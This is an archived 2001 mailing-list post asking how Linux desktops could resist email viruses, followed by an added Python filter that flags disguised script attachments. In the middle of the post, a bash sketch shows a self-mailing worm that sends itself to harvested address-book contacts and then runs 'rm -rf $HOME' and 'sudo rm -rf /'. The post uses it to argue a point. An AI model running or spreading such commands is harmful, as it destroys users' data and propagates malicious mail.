[plug] security of linux desktops re mail viri

craig at postnewspapers.com.au craig at postnewspapers.com.au
Tue Dec 11 16:32:07 WST 2001


hi all

A bit of a rave following. It was intended to be a bit more coherent. I
don't intend trolling or flamebait here, I'm asking a question and
looking for opinions on something that's bothered me for some time now.

People trumpet about linux being more secure than
windows, less prone to worms, etc. So far, it has been so beyond any reasonable argument.

Fine. However, many of the most destructive
windows exploits come down to a few factors:

	1) stupid, stupid users (ooh, anna_naked.jpg.vbs, I'll open
	that, it's a JPEG...!)
	
	2) programs that are too fond of being "smart" and "doing things
	for you" (this eMail tells me to run the attachment w/o even
	asking the user, I'll do that because some dumb git might've
	sent me an executable christmas card...)

	3) INSECURE DEFAULTS allowing (2) to happen. (1) is, alas, not
	preventable without a shotgun. Sure, it helps the idiots use the
	PC. A bit. Maybe. Until they get a virus that nukes their pc.
	But is it worth it? 

	4) Powerful scripting and inter-app communication capabilities,
	as provided by windows scripting host, vbs, etc.

	5) Lack of user education and desire to understand what the
	f**ck they're doing

most distros have (4) in abundance. Look at bash, dcop, bonobo,
etc. Not to mention perl and python! I love these features and would find linux much less nice
to use without them, but similar reasons probably governed
the inclusion of visual basic in windows.
	
Nobody is proof against (1) or (5)
unless someone comes up with an instant remote IQ test combined
with lockdown (I've never found an electrified ZIP drive
labelled "floppy" to be good enough *grin*).
	
(3) and (2) are becoming more and more popular in the quest for "easy to use" programs and environments. 

And sadly, (1) is becoming more and more common even on linux, as
companies start to deploy linux for workstations etc.

So, what is to stop a linux email virus, when it can be as simple as 
	#!/bin/bash
	mutt nobody at nowhere.com -a this_script \
	-b list_of_targets_grabbed_by_perlscript_from_common_mail_client_addressbooks \
	-s "open me stupid 13 year olds (if only they were the only
	ones), naked pictures"
	rm -rf $HOME
	# because a fair number of people have sudoers including me
	# ALL(ALL) for desktops and may have used sudo recently
	sudo rm -rf /
	
Name something like that (ok, more sophisticated but dammit I don't
write viri, never have, never will, and would like to find and kill
slowly and painfully those who do), called "anna_naked.jpg.sh"... face
it, a fair number of users are going to run it. In many mail clients,
you could just double-click on it to run it, I fear. (3) strikes again.

Currently the danger isn't large because most linux users don't fit
number (1) and (5) but the number is growing, esp. with corporate
installs, etc. The linux user base is also small enough that the chance
of more than a couple of people in a gathered addressbook also running
linux are still quite small. However, nothing stops the virus having a vbscript and a shell
script, and attaching both in the hope the user will either open the
relevant one first or, having opened one and got gibberish, open the
other. And the desktop linux user-base is growing.

Now linux mail clients, etc, tend to be more security aware than, say,
outlook express. But outlook express isn't the only windows mail client
spreading viri - it just does it better. Nothing is to stop auto-execute
vulnerabilities in MUAs for linux, and even if there are none...

You can NEVER stop a stupid user.

OK, you can kill them. But the boss won't let me do that to the users
here - and anyway we'd have about 3 staff left *grin*

So what is to prevent linux desktops from becoming just as bad as
non-outlook-using windows PCs - or even, *gasp*, as bad as windows PCs
with outlook express, due to an auto-execute vulnerability in some MUA?

So, thoughts anybody? And I'd appreciate it if nobody tries to kill me
for my questions and opinions here...
 
-----------
Craig Ringer
IT Manager
POST Newspapers
http://www.postnewspapers.com.au/
Key Fingerprint: AF1C ABFE 7E64 E9C8 FC27  C16E D3CE CDC0 0E93 380D
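Added example, not part of the post above: a small defensive filter, written here for illustration, that a mail gateway or MUA hook could run over incoming messages to flag the "anna_naked.jpg.sh" style of attachment the post describes. It uses only the Python 3.9+ standard library `email` module; the extension lists and the sample message are constructed assumptions, not anything from the list.

```python
"""Flag mail attachments that look like disguised scripts or executables."""
import email
from email import policy
from email.message import EmailMessage

# Extensions a mail client or user might run directly (assumed list, extend as needed).
EXEC_EXTENSIONS = {"sh", "bash", "vbs", "exe", "bat", "pl", "py", "scr", "pif"}
# Harmless-looking extensions used as bait in double-extension names like photo.jpg.sh.
BAIT_EXTENSIONS = {"jpg", "jpeg", "gif", "png", "txt", "doc", "pdf"}

def classify_attachment(filename: str, data: bytes) -> list[str]:
    """Return the reasons this attachment is risky (empty list if none)."""
    reasons = []
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXTENSIONS and parts[-2] in BAIT_EXTENSIONS:
        reasons.append(f"double extension disguises executable: {filename}")
    elif len(parts) >= 2 and parts[-1] in EXEC_EXTENSIONS:
        reasons.append(f"executable extension: .{parts[-1]}")
    # Check the content too: renaming the file does not change its first bytes.
    head = data[:2]
    if head == b"#!":
        reasons.append("content begins with a shebang (shell/perl/python script)")
    elif head == b"MZ":
        reasons.append("content begins with an MZ header (Windows executable)")
    return reasons

def scan_message(raw: bytes) -> dict[str, list[str]]:
    """Map each attachment filename in a raw RFC 822 message to its risk reasons."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        findings[name] = classify_attachment(name, payload)
    return findings

def build_sample() -> bytes:
    """Constructed sample message: one real picture, one script named like a picture."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "pictures"
    msg.set_content("see attached")
    msg.add_attachment(b"\xff\xd8\xff\xe0JFIF-constructed", maintype="image",
                       subtype="jpeg", filename="holiday.jpg")
    msg.add_attachment(b"#!/bin/bash\necho constructed harmless sample\n",
                       maintype="application", subtype="octet-stream",
                       filename="anna_naked.jpg.sh")
    return msg.as_bytes()
```

Quarantining anything `scan_message` flags addresses factor (2)/(3) at the gateway rather than relying on the user; it does nothing about a client that auto-executes, so the attachment still has to be delivered without the execute bit and without being run.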